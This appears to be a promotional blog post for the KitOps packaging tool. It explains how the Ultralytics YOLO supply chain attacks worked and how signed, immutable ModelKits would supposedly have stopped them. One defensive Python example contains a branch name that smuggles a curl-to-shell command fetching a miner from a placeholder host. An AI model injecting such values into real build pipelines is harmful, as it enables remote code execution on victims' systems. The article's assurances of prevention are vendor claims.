How KitOps Would Have Prevented the YOLO Supply Chain Attacks
...and how to protect your organization today
In December 2024, the Ultralytics YOLO models were hit by not one but two sophisticated supply chain attacks. Given that YOLO is the most popular computer vision model, it’s unsurprising that these attacks impacted hundreds of thousands of users - from enterprises and governments to researchers and hobbyists. Many of these users unknowingly ran cryptomining software (attack #1), and some could even have had data stolen (attack #2).
Both incidents exploited weaknesses that exist in almost every AI/ML packaging pipeline today - whether in the cloud or on-premises.
The good news is that it’s easy to protect yourself - these attacks would have been prevented with the KitOps open source AI/ML packaging standard (https://kitops.org/).
This article will walk you through how those attacks happened, and why immutable packaging for AI/ML projects would have blocked both attacks at multiple layers - using defense-in-depth to avoid AI/ML supply chain attacks.
How the Ultralytics YOLO Supply Chain Was Compromised... Twice
Attack 1: CI/CD Injection via GitHub Actions
The first attack targeted Ultralytics’ GitHub Actions build pipeline:
Attackers submitted malicious pull requests containing branch names with embedded shell commands.
The GitHub Actions workflow parsed branch names unsafely, allowing those shell commands to execute during the build.
The injected shell commands inserted malicious code into the built artifacts - code that would download and run a cryptocurrency miner when a user installed the package.
Compromised versions (8.3.41 and 8.3.42) were automatically published to PyPI as the last step of the GitHub Actions workflow - those builds looked legitimate to unsuspecting users.
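The injection mechanism can be sketched in a few lines. This is a hypothetical illustration (not the actual Ultralytics workflow): a build step that splices an untrusted branch name into a shell command string, versus the safe alternative of passing it as an argument.

```python
import subprocess

# Attacker-controlled branch name with an embedded shell payload
# (the URL and payload are made up for illustration).
branch = 'feature"; curl -s https://evil.example/miner.sh | sh; echo "'

# UNSAFE: interpolating untrusted input into a shell string means the
# embedded commands would execute during the build.
unsafe_cmd = f'echo "Building branch: {branch}"'
# subprocess.run(unsafe_cmd, shell=True)  # would run the attacker's payload

# SAFE: pass untrusted values as arguments, never through a shell.
result = subprocess.run(
    ["echo", f"Building branch: {branch}"],
    capture_output=True, text=True,
)
print(result.stdout.strip())  # the payload is printed as inert text, not executed
```

The same principle applies in GitHub Actions: untrusted context values (like branch names) should be passed through environment variables or action inputs rather than interpolated directly into `run:` scripts.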
Attack 2: PyPI API Key Compromise
After the first breach was discovered, Ultralytics created and posted a clean release (8.3.43). Unfortunately, the attackers had obtained Ultralytics’ own API credentials for PyPI, the repository where its builds were distributed.
Using these credentials, the attackers uploaded two newer (and even more malicious) versions (8.3.45 and 8.3.46) to the Ultralytics repository.
These new versions went further than the first attack, adding data exfiltration code alongside the previous cryptocurrency miner.
Once again, users downloaded these new versions believing they were safe (they appeared to have been uploaded by Ultralytics after all!), exposing them to potential data theft.
The Core Problems: Mutable Packages, and Implicit Trust
These attacks succeeded even after the original breach had been discovered because they exploited the normal assumptions of both producers and consumers:
New versions are trustworthy by default.
The publisher has full, persistent write access.
CI/CD pipelines directly push packages without immutable build guarantees.
These assumptions aren’t unique to PyPI; they hold for nearly every pipeline, repository, and distribution mechanism.
Once inside the trusted supply chain and publishing flow, an attacker can ship anything.
This is frightening for two reasons:
AI/ML projects can’t be built without multiple pipelines and an often lengthy supply chain.
AI/ML supply chains are not only vulnerable to attack, but also to human error - both can introduce vulnerabilities that can irreparably damage a brand.
Where KitOps Breaks the Attack Chain
KitOps is designed from the ground up to secure the AI/ML supply chain by replacing mutable package publishing with immutable ModelKits as OCI Artifacts.
Here’s how KitOps ModelKits would have stopped these attacks.
Fix: Immutable Artifacts
Every ModelKit (and each layer inside the ModelKit) is addressed with a unique cryptographic digest (SHA256). Once a ModelKit is built and pushed, it *can’t* be overwritten or modified.
When the attacker injected malicious code into the source files, the affected layers of the KitOps ModelKit would have had new digests. A simple check for mismatched digests would have flagged the unexpected change, and the pipeline could have been stopped before publishing.
Result: ModelKit immutability would have made it impossible to hide the malicious code changes.
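Content addressing is what makes this work. A minimal sketch (using Python's standard `hashlib`, with made-up layer contents) shows why no change, however small, can hide behind an existing tag or version number:

```python
import hashlib

def layer_digest(data: bytes) -> str:
    # OCI layers are content-addressed: the SHA256 digest *is* the identity.
    return "sha256:" + hashlib.sha256(data).hexdigest()

original = b"model weights and inference code"          # illustrative contents
tampered = b"model weights and inference code + miner"  # attacker's version

d1 = layer_digest(original)
d2 = layer_digest(tampered)

# Any modification produces a different digest, so a pipeline comparing
# digests against the originals immediately detects the tampering.
assert d1 != d2
print(d1)
print(d2)
```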
Fix: Detached Build & Publish
KitOps decouples build and publish - both can still be automated, but they become two distinct steps, giving machines or humans a chance to react to unexpected situations before anything is exposed to the world.
With KitOps, builds happen in isolated environments, and only the immutable ModelKit is pushed to the registry. A delivery pipeline can then check that the cryptographic digest of each file in the ModelKit matches the original digest.
Result: The output of the compromised GitHub Action would have been detected when it was pushed to the internal registry, before it was distributed to the public.
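A publish gate of this kind is straightforward to implement. The sketch below is hypothetical (file names and contents are invented): the build step records digests in its isolated environment, and the publish step refuses to proceed unless every file still matches.

```python
import hashlib

def file_digests(files: dict[str, bytes]) -> dict[str, str]:
    """Map each file name to the SHA256 digest of its contents."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}

# Step 1 (build): digests recorded in the isolated build environment.
built = {"model.onnx": b"weights", "predict.py": b"print('ok')"}
expected = file_digests(built)

# Step 2 (publish): verify the candidate artifact before it goes anywhere.
def publish_gate(expected: dict[str, str], candidate: dict[str, bytes]) -> bool:
    # Refuse to publish unless every file matches its build-time digest.
    return file_digests(candidate) == expected

# A tampered artifact (one file replaced after the build) is blocked.
received = dict(built, **{"predict.py": b"import miner"})

assert publish_gate(expected, built)         # clean build passes
assert not publish_gate(expected, received)  # tampered artifact is blocked
```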
Fix: Cryptographic Signing
ModelKits can (and should) be signed with publisher keys, allowing consumers to independently verify both the artifact and the publisher’s identity.
This is explicit trust rooted in cryptographic signatures, not in something easy to spoof like a publisher’s repository name.
Result: Even if attackers obtained Ultralytics’ API credentials, they could not sign artifacts as Ultralytics without the private key. Users could have quickly verified that the malicious versions were posted by an entity that was not Ultralytics.
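The key point is that registry credentials and signing keys are separate secrets. A minimal sketch using Ed25519 from the `cryptography` library (real ModelKit signing would typically use a tool like cosign against the OCI registry; the artifact bytes here are invented):

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# The publisher's signing key never leaves their control.
publisher_key = Ed25519PrivateKey.generate()
public_key = publisher_key.public_key()  # distributed to consumers

artifact = b"modelkit manifest bytes"  # illustrative placeholder
signature = publisher_key.sign(artifact)

# A consumer verifies the artifact against the publisher's public key.
public_key.verify(signature, artifact)  # no exception: artifact is authentic

# An attacker with stolen registry credentials still lacks the private key,
# so anything they upload fails verification.
attacker_key = Ed25519PrivateKey.generate()
forged = attacker_key.sign(b"malicious modelkit")
try:
    public_key.verify(forged, b"malicious modelkit")
    verified = True
except InvalidSignature:
    verified = False
assert not verified
```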
Fix: Policy-Based Distribution
ModelKits use the existing OCI standard, which means the same tools used for policy enforcement on containers can enforce policies on ModelKits. For example, a policy might require that only signed, verified, and pre-approved artifacts be delivered to production or public environments.
Result: Even if a malicious artifact made it to the registry, policy engines would have prevented its deployment and public users wouldn’t have been impacted.
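Such an admission policy is simple in spirit. The sketch below is a hypothetical policy check (the field names and the idea of representing artifact metadata as a dict are assumptions for illustration), in the style of what OCI policy engines like Kyverno or OPA enforce for container images:

```python
# Publishers explicitly approved for production deployment (illustrative).
APPROVED_PUBLISHERS = {"ultralytics"}

def admit(artifact: dict) -> bool:
    """Only signed, verified, pre-approved artifacts may be deployed."""
    return (
        artifact.get("signed") is True
        and artifact.get("signature_verified") is True
        and artifact.get("publisher") in APPROVED_PUBLISHERS
    )

good = {"signed": True, "signature_verified": True, "publisher": "ultralytics"}
bad = {"signed": True, "signature_verified": False, "publisher": "ultralytics"}

assert admit(good)      # verified, approved artifact is deployable
assert not admit(bad)   # unverifiable signature: blocked before deployment
```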
TL;DR: The Attacks Would Have Failed
The injected code from both attacks would have been detected immediately, before it was distributed to the public.
Using signed artifacts for distribution would have highlighted that the malicious versions posted in the second attack were not from a trusted Ultralytics source.
A policy check in the distribution pipeline would have blocked any artifacts that did not match their source material or were improperly signed.
Users would never even have been exposed to the malicious versions. The attacks would have been detected and dealt with internally, saving users from pain and sparing Ultralytics’ reputation.
These Attacks are Just the Beginning
These kinds of attacks aren’t theoretical anymore. Ultralytics is only the most recent, high-profile example. CI/CD compromise, credential theft, and poisoned public package repositories are now routine in AI/ML:
In February 2024, over 100 models on Hugging Face were found to open backdoors on users' computers.
In February 2025, ReversingLabs identified an attack called NullifAI that abused the common Pickle file serialization format.
If you want to protect your customers and your brand, you can build KitOps ModelKits into your existing workflows and pipelines using our SDK or CLI, and host ModelKits on a private Jozu Hub behind your firewall.
Learn more at: